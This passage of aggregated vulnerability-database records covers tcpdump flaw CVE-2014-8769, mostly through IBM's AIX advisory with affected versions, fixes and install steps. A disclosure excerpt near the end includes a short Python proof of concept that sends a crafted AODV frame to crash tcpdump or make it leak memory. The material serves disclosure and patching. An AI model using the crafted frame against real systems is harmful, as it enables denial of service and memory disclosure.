Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/\n CVE-2014-8769: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "e041d87a0b9a5d40b8483499481f8cbaa1e50018a191837aeb552e95eae17758", "hashmap": [{"hash": "45574d737fa8e127d220db72c1f69aee", "key": "title"}, {"hash": "cdbce5fca5918eed20ded6147ba8526c", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b3202fb5837d6d5c3b25d37ae887006c", "key": "modified"}, {"hash": "2ca42b21a4f60f926451a7a96f35040f", "key": "aixFileset"}, {"hash": "9855627921475e40e00f92d60af14cb3", "key": "reporter"}, {"hash": "4d242e083b54b9dcd62e5929cd34c649", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1f29179c46d95ecb82af8cffff89093d", "key": "cvelist"}, {"hash": "3502a2da909f90ed24ade4b158ee1cbf", "key": "description"}, {"hash": "7eeeede55cff5246d5628aad38e6a664", "key": "aix"}, {"hash": "93b5dede08410aa847f1b27d5e899dcc", "key": "href"}], "history": [], "href": "https://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc", "id": "TCPDUMP_ADVISORY.ASC", "lastseen": "2018-08-30T20:08:08", "modified": "2015-03-24T13:39:27", "objectVersion": "1.3", "published": "2015-03-18T10:29:53", "references": [], "reporter": "CentOS Project", "title": "Vulnerability in AIX tcpdump", "type": "aix", "viewCount": 11}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T20:08:08"}, {"bulletin": {"aix": {"apars": []}, "aixFileset": [{"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}], "bulletinFamily": "unix", "cvelist": ["CVE-2014-8769"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Wed Mar 18 10:29:53 CDT 2015\n|Updated: Tue Mar 24 13:39:27 CDT 2015\n|Update: Corrected 6.1.9.4 iFix checksum\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Vulnerability in AIX tcpdump\n\n PLATFORMS: AIX 6.1, and 7.1 releases\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below\n\n THREAT: A remote attacker can cause denial of service\n\n CVE Number: CVE-2014-8769 CVSS=5.00\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION (from cve.mitre.org)\n\n CVE-2014-8769\n tcpdump is vulnerable to a denial of service, caused by the improper\n handling of input by the application decoder for the Ad hoc On-Demand\n Distance Vector (AODV) protocol. By sending specially-crafted data, a\n remote attacker could exploit this vulnerability to cause the application\n to crash.\n\n Please see following for more information:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\n\nII. CVSS\n\n CVE-2014-8769 \n CVSS Base Score: 5.00\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/98764 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n Note: To use the following commands on VIOS you must first\n execute:\n\n oem_setup_env\n\n To determine if your system is vulnerable, execute the following\n command:\n\n lslpp -L bos.net.tcp.server\n\n The following fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n ----------------------------------------------------------\n bos.net.tcp.server 6.1.8.0 6.1.8.18 key_w_fs\n bos.net.tcp.server 6.1.9.0 6.1.9.30 key_w_fs\n bos.net.tcp.server 7.1.2.0 7.1.2.18 key_w_fs\n bos.net.tcp.server 7.1.3.0 7.1.3.30 key_w_fs\n\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ----------------------------------------------------------------\n bos.net.tcp.server 6.1.8.0(2.2.2.0) 6.1.8.18(2.2.2.6)\n bos.net.tcp.server 6.1.9.0(2.2.3.0) 6.1.9.30(2.2.3.4)\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability KEY\n -------------------------------------------------------------\n 6.1.8 IV68950 09/30/2015 SP7 key_w_apar\n 6.1.9 IV68992 05/29/2015 SP5 key_w_apar\n 7.1.2 IV68951 09/30/2015 SP7 key_w_apar\n 7.1.3 IV67588 05/29/2015 SP5 key_w_apar\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV68950\n http://www.ibm.com/support/docview.wss?uid=isg1IV68992\n http://www.ibm.com/support/docview.wss?uid=isg1IV68951\n http://www.ibm.com/support/docview.wss?uid=isg1IV67588\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp or\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar\n https://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar\n\n The links above are to a tar file containing the signed\n advisory, fix packages, and PGP signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n --------------------------------------------------\n 6.1.8.5 IV68950s5a.150205.epkg.Z key_w_fix \n 6.1.8.6 IV68950s5a.150205.epkg.Z key_w_fix\n 6.1.9.4 IV68992s4a.150204.epkg.Z key_w_fix\n 7.1.2.5 IV68951s5a.150205.epkg.Z key_w_fix\n 7.1.2.6 IV68951s5a.150205.epkg.Z key_w_fix\n 7.1.3.4 IV67588s4a.150204.epkg.Z key_w_fix\n\n VIOS Level Interim Fix (*.Z)\n -------------------------------------\n 2.2.2.5 IV68950s5a.150205.epkg.Z\n 2.2.2.6 IV68950s5a.150205.epkg.Z \n 2.2.3.4 IV68992s4a.150204.epkg.Z \n\n To extract the fixes from the tar file:\n tar -xvf tcpdump_fix.tar\n cd tcpdump_fix\n\n Verify you have retrieved the fixes intact:\n\n\t\tThe checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n f35915e5d216820cdb2c530d9fb667bf7439293a310b1d17ba420aa613f10cd5 IV68950s5a.150205.epkg.Z key_w_csum \n| 2f0e6e863647a6c4a786a881363b1dc62aa5c3612aab5d2761ab0c14a7d799be IV68992s4a.150204.epkg.Z key_w_csum\n 7baa89d4387dd0251b83b4598773d3fc5b8bb6080a50bc3ee3881e70b5052fed IV68951s5a.150205.epkg.Z key_w_csum\n 753e23a332f7e617007159bebb5e4d02c5bfdc0a2566714546b9c2ec4d512978 IV67588s4a.150204.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\nV. WORKAROUNDS (from kb.isc.org)\n None.\n\nVI. OBTAINING FIXES\n\n AIX security fixes can be downloaded from:\n\n ftp://aix.software.ibm.com/aix/efixes/security\n\n AIX fixes can be downloaded from:\n\n http://www.ibm.com/eserver/support/fixes/fixcentral/main/pseries/aix\n\n NOTE: Affected customers are urged to upgrade to the latest\n applicable Technology Level and Service Pack.\n\nVII. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n and click on the \"My notifications\" link.\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\nVIII. ACKNOWLEDGMENTS\n N/A.\n\nIX. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/\n CVE-2014-8769: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "edition": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "e24a0caf3d333f838bc77ecfa043fe4639a6723a1b8d4b69fe6d8befc77bdc6e", "hashmap": [{"hash": "45574d737fa8e127d220db72c1f69aee", "key": "title"}, {"hash": "cdbce5fca5918eed20ded6147ba8526c", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b3202fb5837d6d5c3b25d37ae887006c", "key": "modified"}, {"hash": "2ca42b21a4f60f926451a7a96f35040f", "key": "aixFileset"}, {"hash": "9855627921475e40e00f92d60af14cb3", "key": "reporter"}, {"hash": "4d242e083b54b9dcd62e5929cd34c649", "key": "published"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1f29179c46d95ecb82af8cffff89093d", "key": "cvelist"}, {"hash": "ea1bdd9185a2c3160cbbe9c0292c3d62", "key": "cvss"}, {"hash": "3502a2da909f90ed24ade4b158ee1cbf", "key": "description"}, {"hash": "7eeeede55cff5246d5628aad38e6a664", "key": "aix"}, {"hash": "93b5dede08410aa847f1b27d5e899dcc", "key": "href"}], "history": [], "href": "https://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc", "id": "TCPDUMP_ADVISORY.ASC", "lastseen": "2016-10-24T17:48:11", "modified": "2015-03-24T13:39:27", "objectVersion": "1.2", "published": "2015-03-18T10:29:53", "references": [], "reporter": "CentOS Project", "title": "Vulnerability in AIX tcpdump", "type": "aix", "viewCount": 11}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-10-24T17:48:11"}], "edition": 3, "hashmap": [{"key": "aix", "hash": "7eeeede55cff5246d5628aad38e6a664"}, {"key": "aixFileset", "hash": "2ca42b21a4f60f926451a7a96f35040f"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "1f29179c46d95ecb82af8cffff89093d"}, {"key": "cvss", "hash": "ea1bdd9185a2c3160cbbe9c0292c3d62"}, {"key": "description", "hash": "3502a2da909f90ed24ade4b158ee1cbf"}, {"key": "href", "hash": "93b5dede08410aa847f1b27d5e899dcc"}, {"key": "modified", "hash": "b3202fb5837d6d5c3b25d37ae887006c"}, {"key": "published", "hash": "4d242e083b54b9dcd62e5929cd34c649"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9855627921475e40e00f92d60af14cb3"}, {"key": "title", "hash": "45574d737fa8e127d220db72c1f69aee"}, {"key": "type", "hash": "cdbce5fca5918eed20ded6147ba8526c"}], "hash": "e24a0caf3d333f838bc77ecfa043fe4639a6723a1b8d4b69fe6d8befc77bdc6e", "viewCount": 25, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-8769"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31395", "SECURITYVULNS:DOC:31477", "SECURITYVULNS:VULN:14136", "SECURITYVULNS:VULN:14095", "SECURITYVULNS:VULN:14630", "SECURITYVULNS:DOC:32390"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129157"]}, {"type": "nessus", "idList": ["AIX_IV68951.NASL", "AIX_IV67588.NASL", "AIX_IV68992.NASL", "AIX_IV68950.NASL", "FEDORA_2014-15549.NASL", "SUSE_11_TCPDUMP-141215.NASL", "MANDRIVA_MDVSA-2014-240.NASL", "FEDORA_2014-15609.NASL", "OPENSUSE-2015-146.NASL", "DEBIAN_DSA-3086.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310868548", "OPENVAS:1361412562310868783", "OPENVAS:703086", "OPENVAS:1361412562310868523", "OPENVAS:1361412562310703086", "OPENVAS:1361412562310868908", "OPENVAS:1361412562310121344", "OPENVAS:1361412562310869148"]}, {"type": "debian", "idList": ["DEBIAN:DLA-102-1:4756A", "DEBIAN:DSA-3086-1:0C00E"]}, {"type": "gentoo", "idList": ["GLSA-201502-05"]}, {"type": "ubuntu", "idList": ["USN-2433-1"]}, {"type": "archlinux", "idList": ["ASA-201503-20"]}], "modified": "2018-08-31T00:08:38"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "aixFileset": [{"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}], "aix": {"apars": []}}
{"cve": [{"lastseen": "2018-10-10T11:05:24", "bulletinFamily": "NVD", "description": "tcpdump 3.8 through 4.6.2 might allow remote attackers to obtain sensitive information from memory or cause a denial of service (packet loss or segmentation fault) via a crafted Ad hoc On-Demand Distance Vector (AODV) packet, which triggers an out-of-bounds memory access.", "modified": "2018-10-09T15:54:45", "published": "2014-11-20T12:50:06", "id": "CVE-2014-8769", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8769", "title": "CVE-2014-8769", "type": "cve", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:55", "bulletinFamily": "software", "description": "\r\nCVE-2014-8769 tcpdump unreliable output using malformed AOVD payload\r\n\r\n1. Background\r\n\r\ntcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.\r\n\r\n2. Summary Information\r\n\r\nIt was found out that malformed network traffic (AOVD-based) can lead to an abnormal behaviour if verbose output of tcpdump monitoring the network is used.\r\n\r\n3. Technical Description\r\n\r\nThe application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if other payload exists that might trigger segfaults.\r\n\r\nTo reproduce start tcpdump on a network interface\r\n\r\nsudo tcpdump -i lo -s 0 -n -v\r\n\r\n(running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details)\r\n\r\nand use the following python program to generate a frame on the network (might also need sudo):\r\n\r\n#!/usr/bin/env python\r\nfrom socket import socket, AF_PACKET, SOCK_RAW\r\ns = socket(AF_PACKET, SOCK_RAW)\r\ns.bind(("lo", 0))\r\n\r\naovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"\r\n\r\ns.send(aovd_frame)\r\n\r\n4. Affected versions\r\n\r\nAffected versions are 3.8 through 4.6.2\r\n\r\n5. Fix\r\n\r\nThe problem is fixed in the upcoming version tcpdump 4.7.0\r\n\r\n6. Advisory Timeline\r\n\r\n2014-11-08 Discovered\r\n2014-11-09 Requested CVE\r\n2014-11-11 Reported vendor by email\r\n2014-11-12 Vendor made a fix available as repository patch\r\n2014-11-13 CVE number received\r\n2014-11-13 Published CVE advisory\r\n\r\n7. Credit\r\n\r\nThe issue was found by\r\n\r\nSteffen 